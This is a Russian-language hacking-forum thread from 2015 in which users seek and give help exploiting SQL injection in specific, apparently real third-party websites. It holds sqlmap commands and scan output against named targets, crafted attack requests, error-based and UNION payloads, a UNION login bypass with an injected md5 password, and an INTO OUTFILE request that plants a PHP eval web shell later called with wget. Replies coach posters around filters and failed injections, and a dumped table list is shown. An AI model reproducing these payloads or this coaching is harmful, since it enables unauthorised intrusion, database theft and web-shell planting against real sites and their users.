Просмотр полной версии : Ваши вопросы по уязвимостям.
Страницы :
1
[
2]
3
4
5
6
7
8
9
10
11
12
reuvenmatbil said:
↑ (https://antichat.live/posts/3861651/)
при запуске sqlmap с параметром --os-shell
выдает
[06:35:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
как дальше действовать чтоб получить доступ, какие команды существуют?
права на запись есть
select '' into outfile '/[full_path]/x.php';
Почему на другую версию движка запрос типа
Code:
"-u "www.bogema-hotel.ru/access_admin.php" --eta --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
записает на идеинтичном запросе?
В прошлый раз на прошлом сайте получилось выдернуть логин и пароль, а тут блок какой-то..
Code:
"
sqlmap.py -u "http://www.bogema-hotel.ru" --eta --random-agent
--threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --curr
ent-db --column --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150622}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
starting at 15:24:53
[15:24:53] [INFO] fetched random HTTP User-Agent header from file '
indows; U; Windows NT 6.1; zh-TW; rv:1.9.2.13) Gecko/20101203 AskTbPTV/3.9.1.140
19 Firefox/3.6.13'
custom injection marking character ('*') found in option '--data'. Do you want t
o process it? [Y/n/q] n
[15:24:56] [INFO] testing connection to the target URL
[15:24:56] [INFO] heuristics detected web page charset 'windows-1251'
[15:24:56] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[15:24:57] [INFO] target URL is stable
[15:24:57] [INFO] testing if POST parameter 'auth_login' is dynamic
[15:24:57] [WARNING] POST parameter 'auth_login' does not appear dynamic
[15:24:58] [WARNING] heuristic (basic) test shows that POST parameter 'auth_logi
n' might not be injectable
[15:24:58] [INFO] testing for SQL injection on POST parameter 'auth_login'
[15:24:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[15:26:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[15:26:34] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDE
R BY or GROUP BY clause'
[15:27:07] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (MAKE_SET)'
[15:27:38] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (ELT)'
[15:28:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (bool*int)'
[15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[15:28:44] [INFO] testing 'MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY
clause'
[15:28:49] [WARNING] reflective value(s) found and filtering out
[15:28:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY
clause (original value)'
[15:28:51] [INFO] testing 'MySQL = 5.0 boolean-based blind - Stacked queries'
[15:29:25] [INFO] testing 'MySQL = 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[15:30:06] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[15:30:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[15:30:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[15:30:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[15:30:43] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[15:30:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[15:30:52] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[15:30:53] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
UNSIGNED)'
[15:30:53] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(EXTRACTVALUE)'
[15:30:54] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(UPDATEXML)'
[15:30:54] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause
(BIGINT UNSIGNED)'
[15:30:54] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[15:30:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 66 columns (custom)
'"
Muracha said:
↑ (https://antichat.live/posts/3861670/)
Почему на другую версию движка запрос типа
Code:
"-u "www.bogema-hotel.ru/access_admin.php" --eta --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
записает на идеинтичном запросе?
В прошлый раз на прошлом сайте получилось выдернуть логин и пароль, а тут блок какой-то..
Code:
"
sqlmap.py -u "http://www.bogema-hotel.ru" --eta --random-agent
--threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --curr
ent-db --column --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150622}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
starting at 15:24:53
[15:24:53] [INFO] fetched random HTTP User-Agent header from file '
indows; U; Windows NT 6.1; zh-TW; rv:1.9.2.13) Gecko/20101203 AskTbPTV/3.9.1.140
19 Firefox/3.6.13'
custom injection marking character ('*') found in option '--data'. Do you want t
o process it? [Y/n/q] n
[15:24:56] [INFO] testing connection to the target URL
[15:24:56] [INFO] heuristics detected web page charset 'windows-1251'
[15:24:56] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[15:24:57] [INFO] target URL is stable
[15:24:57] [INFO] testing if POST parameter 'auth_login' is dynamic
[15:24:57] [WARNING] POST parameter 'auth_login' does not appear dynamic
[15:24:58] [WARNING] heuristic (basic) test shows that POST parameter 'auth_logi
n' might not be injectable
[15:24:58] [INFO] testing for SQL injection on POST parameter 'auth_login'
[15:24:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[15:26:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[15:26:34] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDE
R BY or GROUP BY clause'
[15:27:07] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (MAKE_SET)'
[15:27:38] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (ELT)'
[15:28:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (bool*int)'
[15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[15:28:44] [INFO] testing 'MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY
clause'
[15:28:49] [WARNING] reflective value(s) found and filtering out
[15:28:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY
clause (original value)'
[15:28:51] [INFO] testing 'MySQL = 5.0 boolean-based blind - Stacked queries'
[15:29:25] [INFO] testing 'MySQL = 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[15:30:06] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[15:30:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[15:30:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[15:30:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[15:30:43] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[15:30:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[15:30:52] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[15:30:53] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
UNSIGNED)'
[15:30:53] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(EXTRACTVALUE)'
[15:30:54] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(UPDATEXML)'
[15:30:54] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause
(BIGINT UNSIGNED)'
[15:30:54] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[15:30:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 66 columns (custom)
'"
значит нужно подобрать вектор вручную и посмотреть, что не так
man4747 said:
↑ (https://antichat.live/posts/3861660/)
Помогите, пожалуйста.
http://www.arbet.am/search.php?CategoryID=1'a (http://www.arbet.am/search.php?CategoryID=1%27a)
Code:
http://www.arbet.am/search.php?CategoryID=1|extractvalue(1,concat(0x3a ,version()))
Muracha said:
↑ (https://antichat.live/posts/3861670/)
Почему на другую версию движка запрос типа
Потому что там запрос другой multipart
создаете файл request.txt в него код
Code:
POST /access_admin.php HTTP/1.1
Content-Length: 586
Content-Type: multipart/form-data; boundary=----Exploit_Code
Cookie: PHPSESSID=e2fa5bb7d6518aa7b7f3a206febdcff0
Host: www.bogema-hotel.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
------Exploit_Code
Content-Disposition: form-data; name="authorize"
1
------Exploit_Code
Content-Disposition: form-data; name="login"
1*
------Exploit_Code
Content-Disposition: form-data; name="password"
g00dPa$$w0rD
------Exploit_Code--
дальше python.exe "путь_до\sql\sqlmap.py" -r "путь_до\sql\request.txt" --eta --random-agent --threads=10 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=E --dbs
Database: ironlogix_bgmh
[24 tables]
+------------------------------+
| SS_aux |
| SS_brand |
| SS_categories |
| SS_category_product |
| SS_currency_types |
| SS_customers |
| SS_manager |
| SS_manager_dany |
| SS_news |
| SS_order_status |
| SS_ordered_carts |
| SS_orders |
| SS_pages |
| SS_payment |
| SS_payoption |
| SS_product_options |
| SS_product_options_values |
| SS_products |
| SS_products_opt_val_variants |
| SS_review |
| SS_share |
| SS_special_offers |
| SS_tags |
| SS_thumb |
+------------------------------+
Есть форум http://forum.chindirchero.ru/
В поле обновления по адресу "http://forum.chindirchero.ru/upgrade/"
Если вбить \1\ и \1\ появляется ошибка:
Code:
SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='\1\'
Ñîîáùåíèå ñåðâåðà: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\1\'' at line 1
Êîä îøèáêè: 1064
Âðåìÿ: Wednesday 24th o June 2015 12:04:17 PM
Можно ли с помощью sqlmap выдернуть данные?
При составлении запроса и корректировки у меня sqlmap ругался на следующее и писал 404
Может, я неправильно составил запрос?
Code:
indows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 (.NET
CLR 3.5.30729)'
Multipart-like data found in POST data. Do you want to process it? [Y/n/q] Y
[13:11:29] [INFO] testing connection to the target URL
[13:11:29] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and
make sure that everything is set up properly? [Y/n] Y
[13:11:30] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
Code:
POST /index.php HTTP/1.1
Content-Length: 586
Content-Type: multipart/form-data; boundary=----Exploit_Code
Cookie: PHPSESSID=e2fa5bb7d6518aa7b7f3a206febdcff0
Host: www.forum.chindirchero.ru/upgrade/index.php
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
------Exploit_Code
Content-Disposition: form-data; name="username"
\1\
------Exploit_Code
Content-Disposition: form-data; name="username"
\1\
------Exploit_Code
Content-Disposition: form-data; name="password"
g00dPa$$w0rD
------Exploit_Code--
Ну давай рассмотрим запрос:
Code:
SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='\1\'
Ругается на незакрытую кавычку, так как обратный слэш экранирует кавычку, подставляемую по умолчанию.
Можно ли пропихнуть свой пэйлоад? Теоретически можно, если:
1) У тебя есть второй параметр в запросе, который мы можем контролировать. То есть первым параметром мы экранируем кавычку, превращая дальнейший запрос в строковое значение, а вторым параметром прокидываем свою нагрузку.
У тебя в запросе участвует только одна переменная, поэтому это - не наш случай.
Значит нужно пытаться дополнить запрос в рамках одной переменной.
Но для этого, нам надо закрыть первую кавычку.
2) Обязательным условием должно являться, чтобы кавычка не преобразовывалась, а проходила в чистом виде.
Проверяем:
123'\
Response
Code:
SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='123'\'
Как видим, кавычка энкодится. Тухлый вариант.
Самый максимум этой баги - узнать текущий префикс к таблицам.
Muracha said:
↑ (https://antichat.live/posts/3861414/)
сайт
http://www.bogema-hotel.ru/access_admin.php
- с уязвимой админкой.
Вставляю в login "admin ' or '1' =1/*" Перебираю варианты - ' or '1' =1-- но результата не достигаю.
Спустя час решил написать сюда.
Почему так? Фильтрация или неверно заданный запрос? Хотя делал все по авторской статье.
разобрался, в чем проблема.
Code:
SELECT manager, password from SS_manager
NULL. из-за того, что записей нет и не возможно залогиниться даже обойдя авторизацию.
yarbabin said:
↑ (https://antichat.live/posts/3862039/)
разобрался, в чем проблема.
Code:
SELECT manager, password from SS_manager
NULL. из-за того, что записей нет и не возможно залогиниться даже обойдя авторизацию.
Да разве? Как сказал kingbeef, можно использовать error-based векторы. С помощью них можно увидеть записи воочию.
Обойти авторизацию подстановками вроде ' or 1=1 # не получается из-за того, что в запросе участвует только поле login. Соответствие паролей проверяет php скрипт. Варианты:
Вывести записи и подставить их в форму.
Если записей действительно нет, или в них присутствуют непробиваемые хэши, подставить с помощью UNION свои и ввести в поле пароля соответствующий пароль.
XAMEHA said:
↑ (https://antichat.live/posts/3862154/)
присутствуют непробиваемые хэши, подставить с помощью UNION свои и ввести в поле пароля соответствующий пароль.
я правильно понял, что такое сработает только при наличии соответствующих прав?
grimnir said:
↑ (https://antichat.live/posts/3862171/)
я правильно понял, что такое сработает только при наличии соответствующих прав?
Нет, это сработает, если помимо авторизации админка взаимодействует с таблицей пользователей по минимуму. Пример запроса:
Code:
SELECT id, login, pass, priv FROM user WEHRE name = '*'
login = ' UNION SELECT 1, 'admin', md5('1234'), 1 #
pass = 1234
Проблема выше (Muracha'а) решается простым выводом данных.
Unknowhacker
28.06.2015, 12:54
Начнём с того, что у root есть права на запись и полный путь.
Фильтр стоял на операторе select, но я его обошёл. Выполняю запрос:
Code:
ttp://www.angloeasterngroup.com/careers/index.php?parentId=3&careerId=3%27+union+/*!select*/+1,2,3,4,%27%3C?php%20eval%28$_REQUEST[cmd]%29;%20?%3E%27,6,7,8,9,10+from+mysql.user+into+out file+%27C:\xampp\htdocs\cms\shell.php%27+--+ - сброс соеденяния
http://www.angloeasterngroup.com/shell.php?cmd=ls;wget...
================================================== ============
SQL
После кавычки всё слешируется
Code:
http://gordonua.com/search.html?s[text]='
Unknowhacker,
Сброс соединения свидетельствует о том, что вы опять нарвались на WAF. Попробуйте обойти.
Для правильной передачи строки экранируйте содержимое:
'C:\xampp\htdocs\cms\shell.php' => 'C:\\xampp\\htdocs\\cms\\shell.php'
Посылаете ls и wget в eval? Серьезно?
Не забудьте убедиться, что ваши пути - искомые, даже если вы их получили с помощью раскрытия путей.
По умолчанию в XAMPP пустьC:\xampp\htdocs\, а не C:\xampp\htdocs\cms\.
https://forum.antichat.net/threads/424557/page-13#post-3861933
Ребят подскажите пожалуйста
нашел скулю ,не могу раскрутить мепом
Code:
POST /account/doLogin HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://chatgirl.nl
Referer: http://chatgirl.nl/account/
Accept-Language: en-us,en;q=0.5
Host: chatgirl.nl
Cookie: __cfduid=d90bad96b9df60b454800378893a111ae14355093 09; saved_gender_id=11; saved_interest_id=11; saved_region_id=city_611225; saved_nickname=NSFTW
Accept-Encoding: gzip, deflate
Content-Length: 442
Content-Type: application/x-www-form-urlencoded
nickname=&gender_id=-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+ COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2 cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCH AR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a% 2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLA TIONS+GROUP+BY+x)a)®ion_id=city_2466&cv=Geef+hier+een+omschrijving+van+jezelf.&coupon%5B%5D=&username=&password=&screen_resolution=800x400&os=Windows&screen_size=medium
При команде
sqlmap -u "http://chatgirl.nl/account/doLogin" --data="nickname=&gender_id=1*®ion_id=city_2466&cv=Geef+hier+een+omschrijving+van+jezelf.&coupon%5B%5
D=&username=&password=&screen_resolution=800x400&os=Windows&screen_size=medium" --random-agent --level 5 --technique=EU --dbms=MySQL
Меп редиректит на другую страницу
Code:
[19:48:08] [INFO] fetched random HTTP User-Agent header from file 'D:\Pentest\Sql_inj\PentestBox\bin\WebApplications \sqlmap\txt\user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[19:48:14] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://chatgirl.nl/welcome/chat_closed'. Do you want to follow? [Y/n] n
[19:48:18] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[19:48:19] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[19:48:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:48:31] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:48:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[19:48:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:49:06] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:49:19] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[19:49:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:49:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[19:49:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[19:49:30] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[19:49:32] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[19:49:32] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[19:49:32] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[19:49:33] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[19:49:33] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[19:49:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:51:59] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[19:54:21] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[19:56:29] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[19:58:33] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[20:00:50] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[20:03:04] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[20:04:54] [INFO] heuristics detected web page charset 'ascii'
[20:04:54] [WARNING] reflective value(s) found and filtering out
[20:04:54] [INFO] target URL appears to be UNION injectable with 40 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[20:08:10] [INFO] testing 'Generic UNION query (20) - 41 to 50 columns'
[20:17:02] [INFO] testing 'MySQL UNION query (20) - 1 to 10 columns'
[20:23:11] [INFO] testing 'MySQL UNION query (20) - 11 to 20 columns'
[20:25:14] [INFO] testing 'MySQL UNION query (20) - 21 to 30 columns'
[20:27:10] [INFO] testing 'MySQL UNION query (20) - 31 to 40 columns'
[20:29:03] [INFO] testing 'MySQL UNION query (20) - 41 to 50 columns'
[20:31:04] [WARNING] (custom) POST parameter '#1*' is not injectable
хотя скуля есть http://hkar.ru/C3YA
В чем может быть проблема ?
Xsite said:
↑ (https://antichat.live/posts/3863272/)
Ребят подскажите пожалуйста
нашел скулю ,не могу раскрутить мепом
POST /account/doLogin HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin:
http://chatgirl.nl
Referer:
http://chatgirl.nl/account/
Accept-Language: en-us,en;q=0.5
Host: chatgirl.nl
Cookie: __cfduid=d90bad96b9df60b454800378893a111ae14355093 09; saved_gender_id=11; saved_interest_id=11; saved_region_id=city_611225; saved_nickname=NSFTW
Accept-Encoding: gzip, deflate
Content-Length: 442
Content-Type: application/x-www-form-urlencoded
nickname=&gender_id=-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+ COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2 cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCH AR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a% 2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLA TIONS+GROUP+BY+x)a)®ion_id=city_2466&cv=Geef+hier+een+omschrijving+van+jezelf.&coupon%5B%5D=&username=&password=&screen_resolution=800x400&os=Windows&screen_size=medium
При команде
sqlmap -u "
http://chatgirl.nl/account/doLogin
" --data="nickname=&gender_id=1*®ion_id=city_2466&cv=Geef+hier+een+omschrijving+van+jezelf.&coupon%5B%5
D=&username=&password=&screen_resolution=800x400&os=Windows&screen_size=medium" --random-agent --level 5 --technique=EU --dbms=MySQL
Меп редиректит на другую страницу
[19:48:08] [INFO] fetched random HTTP User-Agent header from file 'D:\Pentest\Sql_inj\PentestBox\bin\WebApplications \sqlmap\txt\user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[19:48:14] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to '
http://chatgirl.nl/welcome/chat_closed
'. Do you want to follow? [Y/n] n
[19:48:18] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[19:48:19] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[19:48:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:48:31] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:48:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[19:48:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:49:06] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:49:19] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[19:49:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:49:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[19:49:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[19:49:30] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[19:49:32] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[19:49:32] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[19:49:32] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[19:49:33] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[19:49:33] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[19:49:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:51:59] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[19:54:21] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[19:56:29] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[19:58:33] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[20:00:50] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[20:03:04] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[20:04:54] [INFO] heuristics detected web page charset 'ascii'
[20:04:54] [WARNING] reflective value(s) found and filtering out
[20:04:54] [INFO] target URL appears to be UNION injectable with 40 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[20:08:10] [INFO] testing 'Generic UNION query (20) - 41 to 50 columns'
[20:17:02] [INFO] testing 'MySQL UNION query (20) - 1 to 10 columns'
[20:23:11] [INFO] testing 'MySQL UNION query (20) - 11 to 20 columns'
[20:25:14] [INFO] testing 'MySQL UNION query (20) - 21 to 30 columns'
[20:27:10] [INFO] testing 'MySQL UNION query (20) - 31 to 40 columns'
[20:29:03] [INFO] testing 'MySQL UNION query (20) - 41 to 50 columns'
[20:31:04] [WARNING] (custom) POST parameter '#1*' is not injectable
хотя скуля есть
http://hkar.ru/C3YA
В чем может быть проблема ?
Ты забыл указать параметр для проверки
например -p "gender_id"
ставишь значения --data="пост данные" -p "gender_id"
OxoTnik said:
↑ (https://antichat.live/posts/3863280/)
Ты забыл указать параметр
например -p "gender_id"
ставишь значения --data="пост данные" -p "gender_id"
Параметр на который идет "атака" ,указан * ,тобишь можно без -p
Добавил ,--risk 3
Code:
[20:52:46] [INFO] fetched random HTTP User-Agent header from file 'D:\Pentest\Sql_inj\PentestBox\bin\WebApplications \sqlmap\txt\user-agents.txt': 'Mozilla/5.0 (X11; U; SunOS i86pc; fr; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[20:52:47] [INFO] testing connection to the target URL
[20:52:53] [INFO] heuristics detected web page charset 'ascii'
[20:52:53] [INFO] heuristic (basic) test shows that (custom) POST parameter '#1*' might be injectable (possible DBMS: 'MySQL')
